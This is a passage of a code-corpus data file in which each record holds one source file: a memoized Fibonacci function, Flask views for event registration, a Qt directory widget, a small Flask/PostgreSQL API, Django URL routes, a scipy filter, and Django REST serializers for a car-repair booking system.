+{"seq_id":"484193449","text":"# [0, 1, 1, 2, 3, 5, 8, 13, 21]\n\n#added cache\ncache = {0:1, 1:1}\ndef rec_fib(n):\n    #base cases\n    # if n == 0:\n    #     return 0\n    # if n == 1:\n    #     return 1\n    if n in cache:\n        return cache[n]\n    \n    #if it's not in the cache, we must :\n    # run the recursion, and add to the cache\n    cache[n] = rec_fib(n-1) + rec_fib(n-2)\n    \n    return cache[n]\n    #with the cache we no longer recalculate the same values over and over\n\nprint(rec_fib(5))\n\n","sub_path":"improving.py","file_name":"improving.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"220354655","text":"import collections\nimport datetime\nimport flask\nimport ops_web.db\nimport ops_web.email\nimport ops_web.tasks\nimport uuid\nimport zoneinfo\n\nfrom ops_web.ops_web import apm, app, db, login_required\n\n\nTimeZone = collections.namedtuple('TimeZone', ['display_name', 'tz_name'])\ntime_zones = [\n    TimeZone('UTC-08:00 / US Pacific', 'America/Los_Angeles'),\n    TimeZone('UTC-07:00 / US Mountain', 'America/Denver'),\n    TimeZone('UTC-06:00 / US Central', 'America/Chicago'),\n    TimeZone('UTC-05:00 / US Eastern', 'America/New_York'),\n    TimeZone('UTC-03:00 / Brazil', 'America/Sao_Paulo'),\n    TimeZone('UTC±00:00 / Western Europe', 'Europe/London'),\n    TimeZone('UTC+01:00 / Ireland', 'Europe/Dublin'),\n    TimeZone('UTC+01:00 / Central Europe', 'Europe/Paris'),\n    TimeZone('UTC+02:00 / Eastern Europe', 'Africa/Cairo'),\n    TimeZone('UTC+03:00 / Moscow', 'Europe/Moscow'),\n    TimeZone('UTC+04:00 / United Arab Emirates', 'Asia/Dubai'),\n    TimeZone('UTC+05:30 / India', 'Asia/Kolkata'),\n    TimeZone('UTC+08:00 / Singapore', 'Asia/Singapore'),\n    TimeZone('UTC+08:00 / China', 'Asia/Shanghai'),\n    TimeZone('UTC+09:00 / Japan', 'Asia/Tokyo'),\n    TimeZone('UTC+10:00 / Australia East [Melbourne]', 'Australia/Melbourne'),\n]\n\n\n@app.add_template_global\ndef gen_timezones():\n    yield from time_zones\n\n\n@app.get('/events')\ndef events_redirect():\n    return 
flask.redirect(flask.url_for('events_attend'))\n\n\n@app.get('/events/attend')\n@login_required\ndef events_attend():\n flask.g.events = _events_list_for_attend()\n return flask.render_template('events/attend.html')\n\n\n@app.get('/events/attend/')\n@login_required\ndef events_attend_detail(event_id: uuid.UUID):\n flask.g.employee = ops_web.db.employees.get(db, flask.g.email)\n flask.g.event = _events_get(event_id)\n if flask.g.event is None:\n return flask.abort(404)\n flask.g.event_time_zone = zoneinfo.ZoneInfo(flask.g.event.get('time_zone'))\n flask.g.event_datetime_aware = flask.g.event.get('happens_at').replace(tzinfo=flask.g.event_time_zone)\n flask.g.attendees = _event_registrations_list_for_event(event_id)\n flask.g.attendee_emails = [r.get('attendee_email') for r in flask.g.attendees]\n return flask.render_template('events/attend_detail.html')\n\n\n@app.post('/events/create')\n@login_required\ndef events_create():\n for k, v in flask.request.values.lists():\n app.logger.debug(f'{k}: {v}')\n response = flask.redirect(flask.url_for('events_manage'))\n try:\n happens_at = datetime.datetime.strptime(flask.request.values.get('event-happens-at'), '%Y-%m-%dT%H:%M')\n except ValueError:\n app.logger.warning(f'event-happens-at was not a valid date')\n flask.flash('Invalid request', 'danger')\n return response\n try:\n max_attendees = int(flask.request.values.get('event-max-attendees', '0'))\n except ValueError:\n max_attendees = 0\n event_id = uuid.uuid4()\n params = {\n 'description': flask.request.values.get('event-description'),\n 'email': flask.g.email,\n 'event_id': event_id,\n 'happens_at': happens_at,\n 'limit_attendees': 'event-limit-attendees' in flask.request.values,\n 'location': flask.request.values.get('event-location'),\n 'max_attendees': max_attendees,\n 'registration_notes_template': flask.request.values.get('event-registration-notes-template'),\n 'time_zone': flask.request.values.get('event-timezone'),\n 'title': flask.request.values.get('event-title'),\n 'visible': 'event-visible' in flask.request.values,\n }\n _events_insert(**params)\n ops_web.db.log_entries.insert(db, flask.g.email, f'Create event {event_id}')\n return response\n\n\n@app.post('/events/delete')\n@login_required\ndef events_delete():\n event_id = flask.request.values.get('event-id')\n event = _events_get(event_id)\n if event is not None and flask.g.email in event.get('managers'):\n _events_delete(event_id)\n ops_web.db.log_entries.insert(db, flask.g.email, f'Delete event {event_id}')\n return flask.redirect(flask.url_for('events_manage'))\n\n\n@app.get('/events/manage')\n@login_required\ndef events_manage():\n flask.g.events = _events_list_for_manage(flask.g.email)\n flask.g.event = {}\n return flask.render_template('events/manage.html')\n\n\n@app.get('/events/manage/')\n@login_required\ndef events_manage_detail(event_id: uuid.UUID):\n flask.g.event = _events_get(event_id)\n if flask.g.event is None or flask.g.email not in flask.g.event.get('managers'):\n return flask.abort(404)\n flask.g.event_time_zone = zoneinfo.ZoneInfo(flask.g.event.get('time_zone'))\n flask.g.event_datetime_aware = flask.g.event.get('happens_at').replace(tzinfo=flask.g.event_time_zone)\n flask.g.attendees = _event_registrations_list_for_event(event_id)\n flask.g.employee_emails = ops_web.db.employees.list_emails(db)\n return flask.render_template('events/manage_detail.html')\n\n\n@app.post('/events/register')\n@login_required\ndef events_register():\n for k, v in flask.request.values.lists():\n app.logger.debug(f'{k}: {v}')\n 
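# look up the event first; the checks below reject missing events, duplicate sign-ups, and full capacity\n    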
event_id = flask.request.values.get('event-id')\n event = _events_get(event_id)\n\n if event is None:\n flask.flash('The event you are trying to register for does not exist.', 'danger')\n return flask.redirect(flask.url_for('events_attend'))\n\n event_detail_page = flask.redirect(flask.url_for('events_attend_detail', event_id=event_id))\n\n if flask.g.email in event.get('attendees'):\n flask.flash('You are already registered to attend this event.', 'warning')\n return event_detail_page\n\n if event.get('limit_attendees') and event.get('attendee_count') >= event.get('max_attendees'):\n flask.flash('Registration for this event is full.', 'danger')\n return event_detail_page\n\n params = {\n 'attendee_email': flask.g.email,\n 'attendee_job_title': flask.request.values.get('attendee-job-title'),\n 'attendee_location': flask.request.values.get('attendee-location'),\n 'attendee_name': flask.request.values.get('attendee-name'),\n 'attendee_notes': flask.request.values.get('attendee-notes'),\n 'event_id': event_id,\n }\n _event_registrations_upsert(**params)\n ops_web.db.log_entries.insert(db, flask.g.email, f'Register for event {event_id}')\n ops_web.tasks.scheduler.add_job(task_new_event_registration, args=[event_id, flask.g.email])\n flask.flash('You successfully registered to attend this event.', 'success')\n return event_detail_page\n\n\n@app.post('/events/unregister')\n@login_required\ndef events_unregister():\n for k, v in flask.request.values.lists():\n app.logger.debug(f'{k}: {v}')\n event_id = flask.request.values.get('event-id')\n event = _events_get(event_id)\n if event is None:\n flask.flash('The event whose registration you are trying to cancel does not exist.', 'danger')\n return flask.redirect(flask.url_for('events_attend'))\n _event_registrations_delete(event_id, flask.g.email)\n ops_web.db.log_entries.insert(db, flask.g.email, f'Unregister for event {event_id}')\n flask.flash('You canceled your registration for this event.', 'success')\n return flask.redirect(flask.url_for('events_attend_detail', event_id=event_id))\n\n\n@app.post('/events/update')\n@login_required\ndef events_update():\n for k, v in flask.request.values.lists():\n app.logger.debug(f'{k}: {v}')\n event_id = flask.request.values.get('event-id')\n event = _events_get(event_id)\n\n if event is None:\n flask.flash('The event you are trying to update does not exist.', 'danger')\n return flask.redirect(flask.url_for('events_attend'))\n\n event_detail_page = flask.redirect(flask.url_for('events_manage_detail', event_id=event_id))\n if flask.g.email not in event.get('managers'):\n flask.flash('You do not have permission to update this event.', 'danger')\n return event_detail_page\n\n try:\n happens_at = datetime.datetime.strptime(flask.request.values.get('event-happens-at'), '%Y-%m-%dT%H:%M')\n except ValueError:\n app.logger.warning('event-happens-at was not a valid date')\n flask.flash('Invalid request.', 'danger')\n return event_detail_page\n\n try:\n max_attendees = int(flask.request.values.get('event-max-attendees', '0'))\n except ValueError:\n max_attendees = 0\n params = {\n 'description': flask.request.values.get('event-description'),\n 'event_id': event_id,\n 'happens_at': happens_at,\n 'limit_attendees': 'event-limit-attendees' in flask.request.values,\n 'location': flask.request.values.get('event-location'),\n 'max_attendees': max_attendees,\n 'registration_notes_template': flask.request.values.get('event-registration-notes-template'),\n 'time_zone': flask.request.values.get('event-timezone'),\n 'title': 
flask.request.values.get('event-title'),\n 'visible': 'event-visible' in flask.request.values,\n }\n _events_update(**params)\n ops_web.db.log_entries.insert(db, flask.g.email, f'Update details for event {event_id}')\n return event_detail_page\n\n\n@app.post('/events/update-managers')\n@login_required\ndef events_update_managers():\n for k, v in flask.request.values.lists():\n app.logger.debug(f'{k}: {v}')\n event_id = flask.request.values.get('event-id')\n event = _events_get(event_id)\n\n if event is None:\n flask.flash('The event you are trying to update does not exist.', 'danger')\n return flask.redirect(flask.url_for('events_attend'))\n\n event_detail_page = flask.redirect(flask.url_for('events_manage_detail', event_id=event_id))\n if flask.g.email not in event.get('managers'):\n flask.flash('You do not have permission to update this event.', 'danger')\n return event_detail_page\n\n emails = set(flask.request.values.getlist('managers'))\n emails.add(flask.g.email)\n _event_managers_update(event_id, emails)\n ops_web.db.log_entries.insert(db, flask.g.email, f'Set event {event_id} managers to {emails}')\n\n return event_detail_page\n\n\ndef task_new_event_registration(event_id: uuid.UUID, attendee_email: str):\n apm.client.begin_transaction('task')\n er = _event_registrations_get(event_id, attendee_email)\n with app.app_context():\n body = flask.render_template('email/events-new-registration.html', ctx=er)\n recipients = ','.join([f'<{email}>' for email in er.get('event_manager_emails')])\n event_title = er.get('event_title')\n subject = f'[Ops Web] New registration for your event: {event_title}'\n m = ops_web.email.build_email(recipients, subject, body)\n s = ops_web.db.Settings(db)\n ops_web.email.send_email(s, m)\n apm.client.end_transaction('events-notify-new-registration')\n\n\ndef _event_managers_update(event_id: uuid.UUID, emails: set[str]):\n sql = '''\n delete from event_managers\n where event_id = %(event_id)s\n '''\n params = {\n 'event_id': event_id,\n }\n db.u(sql, params)\n sql = '''\n insert into event_managers (event_id, email) values (%(event_id)s, %(email)s)\n '''\n records = [\n {'event_id': event_id, 'email': e}\n for e in emails\n ]\n db.b(sql, records)\n\n\ndef _event_registrations_delete(event_id: uuid.UUID, email: str):\n sql = '''\n delete from event_registrations\n where event_id = %(event_id)s and attendee_email = %(attendee_email)s\n '''\n params = {\n 'attendee_email': email,\n 'event_id': event_id,\n }\n db.u(sql, params)\n\n\ndef _event_registrations_get(event_id: uuid.UUID, attendee_email: str) -> dict:\n sql = '''\n with m as (\n select event_id, array_agg(email order by email) event_manager_emails\n from event_managers\n group by event_id\n )\n select\n r.attendee_email, r.attendee_job_title, r.attendee_location, r.attendee_name, r.attendee_notes, r.event_id,\n m.event_manager_emails, e.title event_title\n from event_registrations r\n left join events e on e.event_id = r.event_id\n left join m on m.event_id = r.event_id\n where r.event_id = %(event_id)s and r.attendee_email = %(attendee_email)s\n '''\n params = {\n 'attendee_email': attendee_email,\n 'event_id': event_id,\n }\n return db.q_one(sql, params)\n\n\ndef _event_registrations_list_for_event(event_id: uuid.UUID) -> list[dict]:\n sql = '''\n select\n attendee_email, attendee_job_title, attendee_location, attendee_name, attendee_notes, event_id\n from event_registrations r\n where r.event_id = %(event_id)s\n order by attendee_name, attendee_email\n '''\n params = {\n 'event_id': event_id,\n }\n 
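# db.q executes the query and returns a list of row dicts, one per registration.\n 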
return db.q(sql, params)\n\n\ndef _event_registrations_upsert(**kwargs):\n sql = '''\n insert into event_registrations (\n attendee_email, attendee_job_title, attendee_location, attendee_name, attendee_notes,\n event_id\n ) values (\n %(attendee_email)s, %(attendee_job_title)s, %(attendee_location)s, %(attendee_name)s, %(attendee_notes)s,\n %(event_id)s\n ) on conflict (event_id, attendee_email) do update set\n attendee_job_title = %(attendee_job_title)s, attendee_location = %(attendee_location)s,\n attendee_name = %(attendee_name)s, attendee_notes = %(attendee_notes)s\n '''\n db.u(sql, kwargs)\n\n\ndef _events_delete(event_id: uuid.UUID):\n sql = '''\n delete from events where event_id = %(event_id)s\n '''\n params = {\n 'event_id': event_id\n }\n db.u(sql, params)\n\n\ndef _events_get(event_id: uuid.UUID) -> dict:\n sql = '''\n with a as (\n select event_id, array_agg(attendee_email order by attendee_email) attendees, count(*) attendee_count\n from event_registrations\n group by event_id\n ), m as (\n select event_id, array_agg(email order by email) managers\n from event_managers\n group by event_id\n )\n select\n coalesce(a.attendee_count, 0) as attendee_count, coalesce(a.attendees, '{}') as attendees, e.description,\n e.event_id, e.happens_at, e.limit_attendees, e.location, m.managers, e.max_attendees,\n coalesce(e.registration_notes_template, '') as registration_notes_template, e.time_zone, e.title, e.visible\n from events e\n left join a on a.event_id = e.event_id\n left join m on m.event_id = e.event_id\n where e.event_id = %(event_id)s\n '''\n params = {\n 'event_id': event_id,\n }\n return db.q_one(sql, params)\n\n\ndef _events_insert(**kwargs):\n sql = '''\n insert into events (\n description, event_id, happens_at, limit_attendees, location, max_attendees,\n registration_notes_template, time_zone, title, visible\n ) values (\n %(description)s, %(event_id)s, %(happens_at)s, %(limit_attendees)s, %(location)s, %(max_attendees)s,\n %(registration_notes_template)s, %(time_zone)s, %(title)s, %(visible)s\n ) \n '''\n db.u(sql, kwargs)\n sql = '''\n insert into event_managers (event_id, email) values (%(event_id)s, %(email)s) on conflict do nothing\n '''\n db.u(sql, kwargs)\n\n\ndef _events_list_for_attend() -> list[dict]:\n sql = '''\n with a as (\n select event_id, count(*) attendee_count\n from event_registrations\n group by event_id\n )\n select\n coalesce(a.attendee_count, 0) as attendee_count, e.description, e.event_id, e.happens_at, e.limit_attendees,\n e.location, e.max_attendees, e.time_zone, e.title\n from events e\n left join a on a.event_id = e.event_id\n where e.visible is true\n and e.happens_at at time zone e.time_zone > current_timestamp\n order by e.title, e.happens_at\n '''\n return db.q(sql)\n\n\ndef _events_list_for_manage(email: str) -> list[dict]:\n sql = '''\n with a as (\n select event_id, count(*) attendee_count\n from event_registrations\n group by event_id\n )\n select\n coalesce(a.attendee_count, 0) as attendee_count, e.event_id, e.happens_at, e.limit_attendees, e.location,\n e.max_attendees, e.time_zone, e.title, e.visible\n from events e\n left join a on a.event_id = e.event_id\n left join event_managers m on m.event_id = e.event_id\n where m.email = %(email)s\n order by e.title, e.happens_at\n '''\n params = {\n 'email': email,\n }\n return db.q(sql, params)\n\n\ndef _events_update(**kwargs):\n sql = '''\n update events set\n description = %(description)s, happens_at = %(happens_at)s, limit_attendees = %(limit_attendees)s,\n location = %(location)s, 
max_attendees = %(max_attendees)s,\n registration_notes_template = %(registration_notes_template)s, time_zone = %(time_zone)s, title = %(title)s,\n visible = %(visible)s\n where event_id = %(event_id)s\n '''\n db.u(sql, kwargs)\n","sub_path":"ops_web/views/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":17153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"65060138","text":"import os\nimport sys\nimport logging\n\nfrom soma.qt_gui.qt_backend import QtGui, QtCore\nfrom soma.qt_gui import qt_backend\nfrom .File import FileControlWidget\n\nif sys.version_info[0] >= 3:\n unicode = str\n\n\nclass DirectoryControlWidget(FileControlWidget):\n\n \"\"\" Control to enter a directory.\n \"\"\"\n\n @staticmethod\n def is_valid(control_instance, *args, **kwargs):\n \"\"\" Method to check if the new control value is correct.\n\n If the newly entered value is not correct, the background control color\n will be red.\n\n Parameters\n ----------\n control_instance: QWidget (mandatory)\n the control widget we want to validate\n\n Returns\n -------\n out: bool\n True if the control value is a directory,\n False otherwise\n \"\"\"\n # Get the current control palette\n control_palette = control_instance.path.palette()\n\n # Get the control current value\n control_value = control_instance.path.text()\n\n # If the control value contains a directory, the control is valid and the\n # background color of the control is white\n is_valid = False\n if os.path.isdir(control_value) \\\n or (control_instance.output and control_value != \"\"):\n control_palette.setColor(\n control_instance.path.backgroundRole(), QtCore.Qt.white)\n is_valid = True\n\n # If the control value is optional, the control is valid and the\n # background color of the control is yellow\n elif control_instance.optional is True and control_value == \"\":\n control_palette.setColor(\n control_instance.path.backgroundRole(), QtCore.Qt.yellow)\n is_valid = True\n\n # If the control value is empty, the control is not valid and the\n # background color of the control is red\n else:\n control_palette.setColor(\n control_instance.path.backgroundRole(), QtCore.Qt.red)\n\n # Set the new palette to the control instance\n control_instance.path.setPalette(control_palette)\n\n return is_valid\n\n #\n # Callbacks\n #\n\n @staticmethod\n def onBrowseClicked(control_instance):\n \"\"\" Browse the file system and update the control instance accordingly.\n\n If a valid directory has already been entered the dialogue will\n automatically point to this folder, otherwise the current working\n directory is used.\n\n Parameters\n ----------\n control_instance: QWidget (mandatory)\n the directory widget item\n \"\"\"\n # Get the current directory\n current_control_value = os.path.join(os.getcwd(), os.pardir)\n if DirectoryControlWidget.is_valid(control_instance):\n current_control_value = unicode(control_instance.path.text())\n\n # Create a dialogue to select a directory\n folder = qt_backend.getExistingDirectory(\n control_instance, \"Open directory\", current_control_value,\n QtGui.QFileDialog.ShowDirsOnly\n | QtGui.QFileDialog.DontUseNativeDialog)\n\n # Set the selected directory to the path sub control\n control_instance.path.setText(unicode(folder))\n","sub_path":"python/soma/qt_gui/controls/Directory.py","file_name":"Directory.py","file_ext":"py","file_size_in_byte":3244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"156313304","text":"import 
os\n\nimport psycopg2\nfrom flask import Flask, request\nfrom werkzeug.exceptions import HTTPException\nfrom werkzeug.middleware.dispatcher import DispatcherMiddleware\n\nDATABASE_URL = os.environ.get(\"DATABASE_URL\")\nSCHEMA_NAME = os.environ.get(\"SCHEMA_NAME\", \"public\")\nconn = psycopg2.connect(DATABASE_URL, options=f\"-c search_path={SCHEMA_NAME}\")\n\nroot = Flask(__name__)\n\n\n@root.errorhandler(Exception)\ndef handle_exception(e):\n if isinstance(e, HTTPException):\n return e\n return str(e), 500\n\n\n@root.route(\"/\")\ndef entry():\n return \"OK\"\n\n\ndef query_db(query, args=(), one=False):\n with conn:\n with conn.cursor() as curs:\n curs.execute(query, args)\n r = [\n dict((curs.description[i][0], value) for i, value in enumerate(row))\n for row in curs.fetchall()\n ]\n return (r[0] if r else None) if one else r\n\n\n@root.route(\"/doctor\", methods=[\"POST\"])\ndef create_doctor():\n doctor = request.get_json()\n return query_db(\n \"INSERT INTO doctor (name, email, tags) VALUES (%s, %s, %s) RETURNING id\",\n (doctor[\"name\"], doctor[\"email\"], doctor[\"tags\"]),\n one=True,\n )\n\n\n@root.route(\"/doctor/<int:doctor_id>\", methods=[\"GET\"])\ndef get_doctor(doctor_id):\n return query_db(\"SELECT * FROM doctor WHERE id = %s\", (doctor_id,), one=True)\n\n\n@root.route(\"/post\", methods=[\"POST\"])\ndef create_post():\n post = request.get_json()\n return query_db(\n \"INSERT INTO post (owner, tags, content) VALUES (%s, %s, %s) RETURNING id\",\n (post[\"owner\"], post[\"tags\"], post[\"content\"]),\n one=True,\n )\n\n\n@root.route(\"/post\", methods=[\"PUT\"])\ndef reply_post():\n reply = request.get_json()\n reply_id = query_db(\n \"INSERT INTO post (owner, tags, content) VALUES (%s, %s, %s) RETURNING id\",\n (reply[\"owner\"], \"{}\", reply[\"content\"]),\n one=True,\n )\n query_db(\n \"UPDATE post SET replied = array_append(replied, %s) WHERE id = %s RETURNING id\",\n (reply_id[\"id\"], reply[\"post\"]),\n one=True,\n )\n return reply_id\n\n\n@root.route(\"/post/<int:post_id>\", methods=[\"GET\"])\ndef get_post(post_id):\n return query_db(\n \"SELECT * FROM post WHERE id = %s\",\n (post_id,),\n one=True,\n )\n\n\n@root.route(\"/attachment\", methods=[\"POST\"])\ndef create_attachment():\n # Stub endpoint: return an explicit 501 instead of None so Flask does not raise.\n return \"Not implemented\", 501\n\n\napp = DispatcherMiddleware(root)\n","sub_path":"backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"631083164","text":"from django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n\tpath('', views.home, name = 'home'),\n\tpath('shape/', views.shape, name = 'shape'),\n\tpath('change_shape/', views.change_shape, name = 'change-shape'),\n\tpath('circle_settings/', views.circle_settings, name = 'circle-settings'),\n\tpath('colours/', views.colours, name = 'colours'),\n\tpath('grid_settings/', views.grid_settings, name = 'grid-settings'),\n\tpath('line_settings/', views.line_settings, name = 'line-settings'),\n\tpath('square_settings/', views.square_settings, name = 'square-settings'),\n\t]","sub_path":"LEDApp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"439494052","text":"import scipy as sp\nfrom scipy import transpose as t\nfrom scipy.linalg import inv\n\ndef rsk_filter(ymeans,\n transition_matrix,\n translation_matrix,\n group_count_matrix,\n sigma,\n a0,\n Q0,\n Q,\n n_groups\n ):\n\n n_periods, n_vars = ymeans.shape\n\n # alpha hidden layer setup\n n_alpha = len(a0)\n alpha = sp.zeros((n_periods+1, n_alpha))\n alpha_filter = sp.zeros((n_periods+1, n_alpha))\n alpha_filter[0] = a0\n\n # V covariance setup\n V = sp.zeros((n_periods + 1, n_alpha, n_alpha))\n V_filter = sp.zeros((n_periods+1, n_alpha, n_alpha))\n V_filter[0]= Q0\n\n # group count/variance factor\n n_sigma_inv = n_groups*inv(sigma)\n\n for i in range(1, n_periods+1):\n # predict\n alpha[i] = transition_matrix.dot(alpha_filter[i-1, :])\n V[i] = transition_matrix.dot(V_filter[i-1, :]).dot(t(transition_matrix)) + Q\n\n # update\n V_filter[i] = inv(sp.linalg.inv(V[i]) + t(translation_matrix).dot(n_sigma_inv).dot(translation_matrix))\n alpha_filter[i] = alpha[i] + V_filter[i].dot(t(translation_matrix)).dot(n_sigma_inv).dot(ymeans[i - 1] - translation_matrix.dot(alpha[i]))\n\n return alpha, V, alpha_filter, V_filter\n\n\n","sub_path":"rsk/rsk.py","file_name":"rsk.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"426661613","text":"from django.db.models import Prefetch\nfrom rest_framework import serializers\n\nfrom core.models import EntityChangeTracker\nfrom core.models.booking import (\n Booking,\n BookingPackage,\n BookingPackagePanel,\n BookingAddress,\n BookingCheckpoint,\n BookingImage,\n BookingDiscount,\n BookingCoupon,\n BookingFeedback,\n BookingCustFeedback,\n BookingProformaInvoice,\n BookingInvoice,\n BookingReworkPackage,\n BookingReworkPackagePanel,\n BookingQualityChecks,\n TeamAlert,\n BookingHandoverItem,\n BookingChecklist,\n BookingFlag,\n BookingPartDoc,\n BookingPartQuote,\n PartDocNote,\n PartQuoteNote,\n BookingExpectedEOD\n)\nfrom core.constants import ACTION_DICT\nfrom core.models.users import Followup, CreditTransaction\nfrom core.models.payment import Payment\nfrom core.models.message import Messages\nfrom core.models.master import PackagePrice, BookingStatus, City, Package, BookingOpsStatus, CarPanelPrice, \\\n CarReturnReasons, FlagType, PartDocStatus, PartVendor\nfrom masterSerializers import (\n PackagePriceSerializer,\n CarPanelPriceSerializer,\n WorkshopSerializer,\n PackageSerializer,\n CarPanelSerializer,\n QualityCheckSerializer,\n TeamAlertReasonSerializer,\n HandoverItemSerializer,\n DelayReasonsSerializer,\n ChecklistItemSerializer,\n ReturnReasonsSerializer,\n DiscountReasonsSerializer,\n FlagTypeSerializer,\n GenericModelSerializer\n)\nfrom commonSerializers import AddressSerializer, 
DynamicFieldsModelSerializer, MediaSerializer\nfrom core.managers import bookingManager,paymentManager\nfrom userSerializer import UserSerializer, UserCarSerializer, FollowupSerializer\nfrom commonSerializers import ConflictAwareModelSerializer\nfrom custom_serializer_fields import CreateListModelMixin, ObjectUserValidator\nfrom django.contrib.auth import get_user_model\nfrom decimal import Decimal\nfrom django.conf import settings\nfrom core.tasks import send_custom_notification_task\nfrom django.utils import timezone\n\nimport logging\nlogger = logging.getLogger(__name__)\n\n\nclass TestedQualityCheckSerializer(serializers.ModelSerializer):\n # quality_check_id = serializers.IntegerField(required=True)\n # is_passed = serializers.BooleanField(required=True)\n # failure_reason = serializers.CharField(max_length=1024, required=False)\n updated_by = serializers.PrimaryKeyRelatedField(default=serializers.CurrentUserDefault(),\n queryset=get_user_model().objects.all())\n class Meta:\n model = BookingQualityChecks\n exclude = ('booking', 'booking_image')\n\n\nclass BookingHandoverItemCreateSerializer(serializers.ModelSerializer):\n # group = serializers.IntegerField(\n # read_only=True,\n # default=serializers.CreateOnlyDefault(bookingManager.get_handover_group)\n # )\n updated_by = serializers.PrimaryKeyRelatedField(default=serializers.CurrentUserDefault(),\n queryset=get_user_model().objects.all())\n class Meta:\n model = BookingHandoverItem\n exclude = ('booking',)\n extra_kwargs = {'status': {'required': False},'ops_status': {'required': False}}\n\n\nclass BookingChecklistItemCreateSerializer(serializers.ModelSerializer):\n updated_by = serializers.PrimaryKeyRelatedField(default=serializers.CurrentUserDefault(),\n queryset=get_user_model().objects.all())\n media = serializers.ListField(child=MediaSerializer(remove_fields=['media_type', 'desc']), required=False)\n\n class Meta:\n model = BookingChecklist\n exclude = ('booking',)\n extra_kwargs = {'status': {'required': False},'ops_status': {'required': False}}\n\n\nclass BookingPackagePanelSerializer(ConflictAwareModelSerializer):\n panel_details = CarPanelPriceSerializer(source='panel', remove_fields=['city'], read_only=True)\n price = serializers.SerializerMethodField()\n price_text = serializers.SerializerMethodField()\n # rework_panel = BookingReworkPackagePanelSerializer(many=True, read_only=True,\n # remove_fields=['booking_package_panel',\n # 'panel_details'])\n\n class Meta:\n model = BookingPackagePanel\n fields = ('id','booking_package','panel_details','panel','price',\n 'part_price','material_price','labour_price','rework','price_text', 'extra')\n\n def get_price(self,obj):\n price = bookingManager.get_booking_package_panel_price(obj)\n return str(price)\n\n def get_price_text(self, obj):\n price = bookingManager.get_booking_package_panel_price(obj)\n if obj.panel.type_of_work in [CarPanelPrice.TYPE_OF_WORK_REPLACE, CarPanelPrice.TYPE_OF_WORK_REPLACE_FBB]:\n if obj.part_price is None and obj.material_price is None and obj.labour_price is None:\n return \"Part MRP*\"\n elif obj.part_price is None:\n return \"₹ \" + str(int(price)) + \" + Part MRP*\"\n return \"₹ \" + str(price)\n\n def create(self, validated_data):\n booking_package = validated_data.get('booking_package')\n if booking_package.booking.status.flow_order_num >= 15:\n raise serializers.ValidationError(\"Cannot add panel after Work Completed.\")\n if booking_package.booking.rework_booking_id is not None:\n panel = validated_data.get('panel')\n extra = 
validated_data.get('extra')\n if panel and not extra:\n validated_data['part_price'] = 0\n validated_data['material_price'] = 0\n validated_data['labour_price'] = 0\n return super(BookingPackagePanelSerializer,self).create(validated_data)\n\n def update(self, instance, validated_data):\n booking = instance.booking_package.booking\n if booking.status.flow_order_num >= 15:\n raise serializers.ValidationError(\"Cannot update package after Work Completed.\")\n\n if validated_data.get('part_price') or validated_data.get('material_price') or \\\n validated_data.get('labour_price'):\n if not instance.panel.editable:\n raise serializers.ValidationError(\"Price not editable for this panel/part.\")\n\n extra = validated_data.get('extra')\n if not extra:\n extra = instance.extra\n if booking.rework_booking_id is not None and not extra:\n validated_data['part_price'] = 0\n validated_data['material_price'] = 0\n validated_data['labour_price'] = 0\n else:\n if validated_data.get('part_price') or validated_data.get('material_price') or \\\n validated_data.get('labour_price'):\n pass\n else:\n instance.part_price = None\n instance.material_price = None\n instance.labour_price = None\n\n return super(BookingPackagePanelSerializer,self).update(instance, validated_data)\n\n\nclass BookingPackageSerializer(DynamicFieldsModelSerializer):\n package = PackagePriceSerializer(remove_fields=['city'], read_only=True)\n package_id = serializers.PrimaryKeyRelatedField(queryset=PackagePrice.objects.all(),\n source='package', write_only=True)\n booking_package_panel = BookingPackagePanelSerializer(remove_fields=['booking_package'],\n many=True, required=False)\n manual_price = serializers.DecimalField(max_digits=10,decimal_places=2,write_only=True,required=False)\n price = serializers.SerializerMethodField()\n #service_tax = serializers.SerializerMethodField()\n #vat = serializers.SerializerMethodField()\n # rework_package = BookingReworkPackageSerializer(many=True, read_only=True,\n # remove_fields=['booking_package',\n # 'booking_package_details'])\n\n class Meta:\n model = BookingPackage\n fields = ('id','package','booking','package_id','booking_package_panel',\n 'price','manual_price',\n 'part_price','material_price','labour_price',\n 'rework', 'extra'\n )\n\n def get_price(self,obj):\n price = Decimal('0.00')\n if obj.package.package.category == Package.CATEGORY_DENT:\n for panel in obj.booking_package_panel.all():\n price += bookingManager.get_booking_package_panel_price(panel)\n else:\n price = bookingManager.get_booking_package_price(obj)\n return str(price)\n\n # def get_service_tax(self,obj):\n # service_tax = Decimal('0.00')\n # if obj.package.package.category == Package.CATEGORY_DENT:\n # for panel in obj.booking_package_panel.all():\n # service_tax += bookingManager.get_booking_package_panel_service_tax(panel)\n # else:\n # service_tax = obj.service_tax\n # return str(service_tax)\n\n # def get_vat(self,obj):\n # vat = Decimal('0.00')\n # if obj.package.package.category == Package.CATEGORY_DENT:\n # for panel in obj.booking_package_panel.all():\n # vat += bookingManager.get_booking_package_panel_vat(panel)\n # else:\n # vat = obj.vat\n # return str(vat)\n\n def create(self, validated_data):\n booking = validated_data.get('booking')\n if booking.status.flow_order_num >= 15:\n raise serializers.ValidationError(\"Cannot add package after Work Completed.\")\n bp_panels = validated_data.pop('booking_package_panel',[])\n validated_data['price'] = validated_data.pop('manual_price',None)\n\n extra = 
